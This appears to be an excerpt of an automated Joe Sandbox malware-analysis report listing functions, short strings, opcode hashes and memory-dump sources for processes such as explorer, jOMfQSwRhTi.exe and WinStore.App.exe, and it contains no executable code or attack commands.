Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887b00000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3bfdd0e236329f2dc260553f4b612bea235462995b01530acd1fbb714c54e41
Instruction ID: c32261ad8be7e14c533a9503d8e7d9306624b00d688c136b11e0847db3e2797f
Opcode Fuzzy Hash: c3bfdd0e236329f2dc260553f4b612bea235462995b01530acd1fbb714c54e41
Instruction Fuzzy Hash: 4AB01230C5C11ECAE744DB50C8807BD7272BF40380F400034E419B21C1CF782900C740

Non-executed Functions

Function 00007FF887B01980 Relevance: 7.8, Strings: 6, Instructions: 252COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B01B2C
b4y, xrefs: 00007FF887B01BAB
r6y, xrefs: 00007FF887B01B09
r6y, xrefs: 00007FF887B01AE6
"9y, xrefs: 00007FF887B01A92
r6y, xrefs: 00007FF887B01B4F

Memory Dump Source

Source File: 00000010.00000002.1519228172.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887b00000_explorer.jbxd

Similarity

API ID:
String ID: "9y$b4y$r6y$r6y$r6y$r6y
API String ID: 0-2811459466
Opcode ID: 16b7cb9208bd907bd95638fa077df3d2ae6033a3e90d8d59a589d685c868217f
Instruction ID: 41914e78c3c35644649836d2be0d56a55af05604b4c404ed2786908e049aa4e6
Opcode Fuzzy Hash: 16b7cb9208bd907bd95638fa077df3d2ae6033a3e90d8d59a589d685c868217f
Instruction Fuzzy Hash: 8991AE71D08A8D8FEB89DBA8D8957ED7BF1FF96360F40017AD00DD7292DA682815C741

Function 00007FF887B019FD Relevance: 7.7, Strings: 6, Instructions: 238COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B01B2C
b4y, xrefs: 00007FF887B01BAB
r6y, xrefs: 00007FF887B01B09
r6y, xrefs: 00007FF887B01AE6
"9y, xrefs: 00007FF887B01A92
r6y, xrefs: 00007FF887B01B4F

Memory Dump Source

Source File: 00000010.00000002.1519228172.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887b00000_explorer.jbxd

Similarity

API ID:
String ID: "9y$b4y$r6y$r6y$r6y$r6y
API String ID: 0-2811459466
Opcode ID: b216ca661124a6a9fad8a1498553c1b4edd4187b4a633633ab5b6ed636757931
Instruction ID: 5a812005fdbed3b8c0279b8e567abcdc40f0ccb0d67287f31c65760b9eafd0f9
Opcode Fuzzy Hash: b216ca661124a6a9fad8a1498553c1b4edd4187b4a633633ab5b6ed636757931
Instruction Fuzzy Hash: 95817A71D08A8D8FEB89DB68D8957AD7BF1FF9A320F50017AD00DD7292DA682815C741

Function 00007FF887B186FA Relevance: 7.6, Strings: 6, Instructions: 83COMMON

Download Yara Rule

Strings

N_^o, xrefs: 00007FF887B187C2
N_^g, xrefs: 00007FF887B187A2
N_^C, xrefs: 00007FF887B18712
N_^], xrefs: 00007FF887B1877A
N_^=, xrefs: 00007FF887B186FA
N_^q, xrefs: 00007FF887B187C9

Memory Dump Source

Source File: 00000010.00000002.1519228172.00007FF887B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887b0d000_explorer.jbxd

Similarity

API ID:
String ID: N_^=$N_^C$N_^]$N_^g$N_^o$N_^q
API String ID: 0-183438836
Opcode ID: 1266cdcb923d3602cb9b0925fe8c2cccebbce3d38be734d20730c5b5f374206f
Instruction ID: 99f66b7f343f1464000f682e6eab619e8d3ff73ad96bcaa4495e57ca2c3cfd25
Opcode Fuzzy Hash: 1266cdcb923d3602cb9b0925fe8c2cccebbce3d38be734d20730c5b5f374206f
Instruction Fuzzy Hash: 8C216D73A1981845CB557AECBC616EC3B40DB523B9B0409B2EB3CC6043DD28244B86C7

Function 00007FF887B186F8 Relevance: 6.3, Strings: 5, Instructions: 86COMMON

Download Yara Rule

Strings

N_^o, xrefs: 00007FF887B187C2
N_^g, xrefs: 00007FF887B187A2
N_^C, xrefs: 00007FF887B18712
N_^], xrefs: 00007FF887B1877A
N_^q, xrefs: 00007FF887B187C9

Memory Dump Source

Source File: 00000010.00000002.1519228172.00007FF887B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887b0d000_explorer.jbxd

Similarity

API ID:
String ID: N_^C$N_^]$N_^g$N_^o$N_^q
API String ID: 0-3762871587
Opcode ID: bc8b5381da04347975a2cc71e0204795d14090892e5498240bae91917c9a08b7
Instruction ID: 5d4ef2b1b01881d5c512de8f5ec2569bed2b62396dbe74ee2f77323705194b73
Opcode Fuzzy Hash: bc8b5381da04347975a2cc71e0204795d14090892e5498240bae91917c9a08b7
Instruction Fuzzy Hash: 4D215B73A1982545DB557AECBC616EC3B00DB523B5B040AB3EB3CCA043DD28344B86C7

Function 00007FF887B0B64D Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

X, xrefs: 00007FF887B0B577
`, xrefs: 00007FF887B0B6B5
Y, xrefs: 00007FF887B0B6F0
u, xrefs: 00007FF887B0B4AE
H, xrefs: 00007FF887B0B4BB

Memory Dump Source

Source File: 00000010.00000002.1519228172.00007FF887B0B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887b0b000_explorer.jbxd

Similarity

API ID:
String ID: H$X$Y$`$u
API String ID: 0-4051370763
Opcode ID: 64e002109bf11abe4921d38db70843d066c3953248cd93563f37bc794da156b5
Instruction ID: bb416277003f198f22da600dbdf37a182624b5dd2e62f2ac9701057032368936
Opcode Fuzzy Hash: 64e002109bf11abe4921d38db70843d066c3953248cd93563f37bc794da156b5
Instruction Fuzzy Hash: FA419370D496698FEBA8DF14C898BADB6B2BF14345F1045EAD40DB7291CB385E84CF05

Function 00007FF887B149E0 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

b4y, xrefs: 00007FF887B1A0A2
r6y, xrefs: 00007FF887B1A441
r6y, xrefs: 00007FF887B1A102
r6y, xrefs: 00007FF887B1A183

Memory Dump Source

Source File: 00000010.00000002.1519228172.00007FF887B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887b0d000_explorer.jbxd

Similarity

API ID:
String ID: b4y$r6y$r6y$r6y
API String ID: 0-2388845383
Opcode ID: d83415e02ffbe8b1c4048931b4de18d4a5cb0a2c1d8a80dd51338b0ed7582435
Instruction ID: 1aefb69c96713fe55bb8782eedff3ce22977d4d51b81f2965b1038f09dd20743
Opcode Fuzzy Hash: d83415e02ffbe8b1c4048931b4de18d4a5cb0a2c1d8a80dd51338b0ed7582435
Instruction Fuzzy Hash: CB21AE2B79CA3256E61471EDFC655EC7B14DFC23F67090677E349C9082C818584B83EA

Analysis Process: jOMfQSwRhTi.exePID: 8068, Parent PID: 1124COMMON

Executed Functions

Function 00007FF887B2E9B0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b319a340ddbacf7c83c2dd77a6607e0201cfb9d8fcc46234944cdd96f6796bb
Instruction ID: 360df874e2f5cca6249c560e39ae195866cb31f989a68cb4c37680bb0eee5396
Opcode Fuzzy Hash: 7b319a340ddbacf7c83c2dd77a6607e0201cfb9d8fcc46234944cdd96f6796bb
Instruction Fuzzy Hash: 1151E870D5995D8FEB94EFA8D899BEDBBF2FB59340F50016AD00DE3295CA346841CB40

Function 00007FF887B21519 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c359fb8d2b5205171bb97405fd8538a10c9c9dff49c93c045a1af2268e7d02bc
Instruction ID: ece43bdb355ae863882df8fc7e6f818aa3bcb3942d7d94a3c8d94f4e8b2128a9
Opcode Fuzzy Hash: c359fb8d2b5205171bb97405fd8538a10c9c9dff49c93c045a1af2268e7d02bc
Instruction Fuzzy Hash: 45415870D6A64D8FEB95EB98C4546FDBBB2FF59340F94007AD00AE7292CA386844CB40

Function 00007FF887B2162F Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd445f3e6b5fedaffb089b92150644aac92223c8e10d58579c5d4b598b683fb8
Instruction ID: aec1fce338be0ad1aefd3e525dddfaf5a5a338fe4c36cb7370b036e637e476b6
Opcode Fuzzy Hash: bd445f3e6b5fedaffb089b92150644aac92223c8e10d58579c5d4b598b683fb8
Instruction Fuzzy Hash: C021F770D6950D8FEB88EB98C4946FDBBF2FF58341F54416AD00AE72A1CA386980CB04

Function 00007FF887B20E40 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c21eea7152ac965d44a94d77948e8e539925fc68756ce1ad167b6a6c3236833f
Instruction ID: dc8443aec9ac305b7366b0fd7c44afdd9d7215c12c5a7b7a31d91576d00c8f4a
Opcode Fuzzy Hash: c21eea7152ac965d44a94d77948e8e539925fc68756ce1ad167b6a6c3236833f
Instruction Fuzzy Hash: CA219074D5E28E8FE701AB60C8042FE7BB2FF1A345F140676C425D6192DB3C5549CB91

Function 00007FF887B20DC9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8b7137467fae63ccb008a5f1d6e23844efa57a094d7c8153535415aae49cad2
Instruction ID: 98ab3085c5185edb36cda55912cc664473813115fcfd9d75eb3c4c4c8384a4a8
Opcode Fuzzy Hash: c8b7137467fae63ccb008a5f1d6e23844efa57a094d7c8153535415aae49cad2
Instruction Fuzzy Hash: 74115B70D5E24E8FEB11AB60C8042BE77B2FF19340F444576C025A62E2DB3C5684CB81

Function 00007FF887B216F4 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d300057d39aaecdee397de7456598b603cc8670a5a05376f4aebf73df3131df
Instruction ID: 53feb0e8a9d17f4ae3c75883e46c3c5403a63bc748c171017f4b19ae76ef745e
Opcode Fuzzy Hash: 2d300057d39aaecdee397de7456598b603cc8670a5a05376f4aebf73df3131df
Instruction Fuzzy Hash: EB115B3088E3C95FD743ABB088685D97FB4EF47214F1905EBD489CB0A3D66D594AC722

Function 00007FF887B214A0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f1ec7c45410d0895eca50837feff0b3f6e6956a88ba21bad667f7bb5bed800c
Instruction ID: d66d4d03cf0f50540055d2eeebc7be83ae5bb0cbd07251d130ef33c6176ded79
Opcode Fuzzy Hash: 9f1ec7c45410d0895eca50837feff0b3f6e6956a88ba21bad667f7bb5bed800c
Instruction Fuzzy Hash: D7017C3148E3C98FC3139BB488612A47FB5BF07240F4A44EBC495CB4E3D62C6869CB22

Function 00007FF887B20A79 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ad0b98211fdcd58a990329bb47805c51c7dca3a136612ca0cc23ef31dbc88a
Instruction ID: a7ed3af38e237f13fab9af6bd0b7b0f1c797c894d2cbcf08ef6df30679cc2158
Opcode Fuzzy Hash: 15ad0b98211fdcd58a990329bb47805c51c7dca3a136612ca0cc23ef31dbc88a
Instruction Fuzzy Hash: 01018F3189E7C98FE796AB6488652FD7FF1EF56240FC900BAD499C60D2DA285848C711

Function 00007FF887B20A90 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dc80d5efd9a5db6bc19c290fa1d155fc91ad7804c2a6a24a329ff8f6baaaec4
Instruction ID: ae6ef1aa755a2d8f859afe7a85a52f30b5ad13383d5aefda67dfeeb71abf41b0
Opcode Fuzzy Hash: 9dc80d5efd9a5db6bc19c290fa1d155fc91ad7804c2a6a24a329ff8f6baaaec4
Instruction Fuzzy Hash: FCF0B430CAE68D9AE794AB6484542FD7BF1FF1A344FC4007AD49EC20D1DA285594C710

Function 00007FF887B219A5 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b3d4d6a14077347d10880a56c41ef23428633b5d53e4f86bb4bc41d03d4d499
Instruction ID: 5e73e8210bcfb513cfbfc4d79edba5718055c0db67be868b990cef14d42c2d83
Opcode Fuzzy Hash: 0b3d4d6a14077347d10880a56c41ef23428633b5d53e4f86bb4bc41d03d4d499
Instruction Fuzzy Hash: 4EF090309A964D8FDB44EF68C8892ED7BF1FF48340F5400BAD808C3181DB799162CB40

Function 00007FF887B20C36 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction ID: 64badee2a02d79d419471c1e71054d25837e03794c843ce1339a3844d66002bb
Opcode Fuzzy Hash: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction Fuzzy Hash: 73E0ED70DEF4078AE710AA1488845BE7276FF51391F905A31D43A82196DF3C6145CB80

Function 00007FF887B20C04 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction ID: fd5bc6750f8f8dd8b1d592480c016490584d41629c06fa1156df5ad5717f611d
Opcode Fuzzy Hash: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction Fuzzy Hash: 6CE04F70D9B4078AE710AB44C8446BE7372FF50351F404631D43582295DF3C6145CB80

Function 00007FF887B2114D Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction ID: 2e1b3e135711e3c91a07c967f77b5a76b6b5880572313ca7a428f83d28648d19
Opcode Fuzzy Hash: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction Fuzzy Hash: 4BE0EC30A6551ECFDB14EF40C8949BE73B2FF94390F400A39D426D7291DBB86504CB80

Function 00007FF887B20BF5 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction ID: 8295b241af539997e04306660f8429b5210d45bd9ba61b51369ff4125024c8b7
Opcode Fuzzy Hash: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction Fuzzy Hash: 3FE01270D5A406CBE710DB44C8446BE7372FB50351F408226C42687295DB3CA545CF80

Function 00007FF887B2141A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16090f5ebc1c928a33388aa4ed8d2f2e534cd6ca9251174c9960cb722e3b55c8
Instruction ID: a9eb5291ddc1d710c226edb0252a1cb2f25dfd8d712fb91b6ba338da9f7e59dd
Opcode Fuzzy Hash: 16090f5ebc1c928a33388aa4ed8d2f2e534cd6ca9251174c9960cb722e3b55c8
Instruction Fuzzy Hash: F9D0927096962D9EEB90EB58C448BADB6F0BF09345F5041A9D01CD2181DB7815C48B42

Non-executed Functions

Function 00007FF887B21980 Relevance: 7.8, Strings: 6, Instructions: 253COMMON

Download Yara Rule

Strings

b4y, xrefs: 00007FF887B21BAB
r6y, xrefs: 00007FF887B21B4F
r6y, xrefs: 00007FF887B21AE6
r6y, xrefs: 00007FF887B21B09
r6y, xrefs: 00007FF887B21B2C
"9y, xrefs: 00007FF887B21A92

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID: "9y$b4y$r6y$r6y$r6y$r6y
API String ID: 0-2811459466
Opcode ID: 7e3150d355857310bc38e42f7ab188f6128624b7eed9657381d3be3e080568e6
Instruction ID: 609e698dd16972337943b914cad393a69afd5cc04970c8213d9c3f2c3c590013
Opcode Fuzzy Hash: 7e3150d355857310bc38e42f7ab188f6128624b7eed9657381d3be3e080568e6
Instruction Fuzzy Hash: E6919F71D1CA8D8FDB89DBA8D8557AD7BF1FF9A350F40017AD00DC7282DA682815C741

Function 00007FF887B219FD Relevance: 7.7, Strings: 6, Instructions: 239COMMON

Download Yara Rule

Strings

b4y, xrefs: 00007FF887B21BAB
r6y, xrefs: 00007FF887B21B4F
r6y, xrefs: 00007FF887B21AE6
r6y, xrefs: 00007FF887B21B09
r6y, xrefs: 00007FF887B21B2C
"9y, xrefs: 00007FF887B21A92

Memory Dump Source

Source File: 00000011.00000002.1519979460.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff887b20000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID: "9y$b4y$r6y$r6y$r6y$r6y
API String ID: 0-2811459466
Opcode ID: e02a86231f3008dab2ee4e67f4c0ae49421689800127c700210a4a7947e2c68c
Instruction ID: d021b24de3bfc5fccd0732239a982094e1d26f6cb2c88fa5fc9563d1acddf25c
Opcode Fuzzy Hash: e02a86231f3008dab2ee4e67f4c0ae49421689800127c700210a4a7947e2c68c
Instruction Fuzzy Hash: A0819C70D2CA8D8FEB89DBA8D8557ADBBF1FF9A350F800179C00DD7282DA682815C741

Analysis Process: WinStore.App.exePID: 7284, Parent PID: 7952COMMON

Executed Functions

Function 00007FF887B2B964 Relevance: 3.9, Strings: 3, Instructions: 103COMMON

Download Yara Rule

Strings

6y, xrefs: 00007FF887B2B9F1
H, xrefs: 00007FF887B2BAA1
B, xrefs: 00007FF887B2BAAB

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B2B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b2b000_WinStore.jbxd

Similarity

API ID:
String ID: 6y$B$H
API String ID: 0-958282084
Opcode ID: 1d5c3a4bc2b1d9a9b7a25d1000b090f8023aec08b12528137024fb979e74eae5
Instruction ID: 6536fc709739f4d00a3f5caa1f5831469643954b6d3de9788df3896d4d1de03c
Opcode Fuzzy Hash: 1d5c3a4bc2b1d9a9b7a25d1000b090f8023aec08b12528137024fb979e74eae5
Instruction Fuzzy Hash: 8541D770D14E598FDBA8DB189C957AAB7B1FB54342F5001E9D40DE3291EE346A81CF41

Function 00007FF887B2843D Relevance: 2.6, Strings: 2, Instructions: 134COMMON

Download Yara Rule

Strings

^, xrefs: 00007FF887B2849A
M_^, xrefs: 00007FF887B284C9

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B28000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b28000_WinStore.jbxd

Similarity

API ID:
String ID: M_^$^
API String ID: 0-3996576510
Opcode ID: 266d6e73a68fad6cb8dcb33f8c93c5b6dbfbe3bb69ea70480fc8fe8c7bab8e14
Instruction ID: c6ab2948ef1ee0e4bfcc68653437ea6bb5ba8ac13b4fbb3f968521382655d1bc
Opcode Fuzzy Hash: 266d6e73a68fad6cb8dcb33f8c93c5b6dbfbe3bb69ea70480fc8fe8c7bab8e14
Instruction Fuzzy Hash: 9A41D16695E7C65FE703A7A858A51ED3FB0EF13364F4901F7D4A8CA093DE19980AC312

Function 00007FF887B294C1 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B28000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b28000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8335bec7f86cdd84562b4dfa17df872710913918ab2dc9ece18f0fed8bf3c09e
Instruction ID: a7e82ce016281e43fe18fbb1556a092b79314facefc4f0152fc96d30c157f8de
Opcode Fuzzy Hash: 8335bec7f86cdd84562b4dfa17df872710913918ab2dc9ece18f0fed8bf3c09e
Instruction Fuzzy Hash: E1B10571D196598FEB98DFA8D4947ACB7F2FF69340F54407AD00EE7692CA386840CB01

Function 00007FF887B2D9C5 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b2d000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b5053060cd96a8dc2c2ea3edccde96d6a2231790b98c557418cc9328ea8f5a
Instruction ID: fc1c67342ec811b7cd79b119b3ed6d0f484c79256eb5dff2902018cd5d108c41
Opcode Fuzzy Hash: 94b5053060cd96a8dc2c2ea3edccde96d6a2231790b98c557418cc9328ea8f5a
Instruction Fuzzy Hash: 18610970E59A4D8FDB94EFA8D455AADB7B2FF59340F5005BAE00DE7292CE346881CB40

Function 00007FF887B2E991 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b2d000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09a1fc4dc049a7e907f53aebbe68c333fde3f3612309bd30486a543f89779539
Instruction ID: 5a7d63aa27a6ea54a42b1cd9707fecc7a3fc06edaf3ddde7247145276f745341
Opcode Fuzzy Hash: 09a1fc4dc049a7e907f53aebbe68c333fde3f3612309bd30486a543f89779539
Instruction Fuzzy Hash: 77510A70D59A5D8FEB94EBA8D899BECBBF2FB59340F50016AD00DE3296CA345841CB40

Function 00007FF887B2E9B0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b2d000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b719710f3916ec2038befb577a48a50987ced2b5cba1c12f3b883b62caac3884
Instruction ID: e68f858e769f8f4ad7f3b45bba0c4ae89ab4dd7f109a178664d44e8133ac2cb8
Opcode Fuzzy Hash: b719710f3916ec2038befb577a48a50987ced2b5cba1c12f3b883b62caac3884
Instruction Fuzzy Hash: 9751E870D5995D8FEF94EBA8D899BEDBBF2FB59340F50016AD00DE3296CA346841CB40

Function 00007FF887B296AD Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B28000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b28000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bebadcf8882821f4fbe13d2bef457e106f5f8b80b63c2052ce465b6f833e6d6d
Instruction ID: 52de2699f421d503873d4e257cd8b6c32bd0eafcbf07316016fd15e810787b70
Opcode Fuzzy Hash: bebadcf8882821f4fbe13d2bef457e106f5f8b80b63c2052ce465b6f833e6d6d
Instruction Fuzzy Hash: 04519670D1995D8FDF98EF98C4A4BACB7B2FF69340F5440A9D01EE7692CA35A841CB01

Function 00007FF887B2E110 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b2d000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ad4bb99a174c4dc4fa5b52da2e34fe97f849d455c5f85245479a67a3325e7ce
Instruction ID: df84d4d90030016e3f9ccb5f199fa0ebc8d298fbea7a148220e51121c682c19b
Opcode Fuzzy Hash: 2ad4bb99a174c4dc4fa5b52da2e34fe97f849d455c5f85245479a67a3325e7ce
Instruction Fuzzy Hash: F0419030D5964D8FEB41EBA4D8557FDBBB1FF0A310F4405B6E408E72A2CA386845CB92

Function 00007FF887B21519 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1341a56488223307d42014d1cf0191edc2dfb40f8cf117238c43e6bb9be09ab0
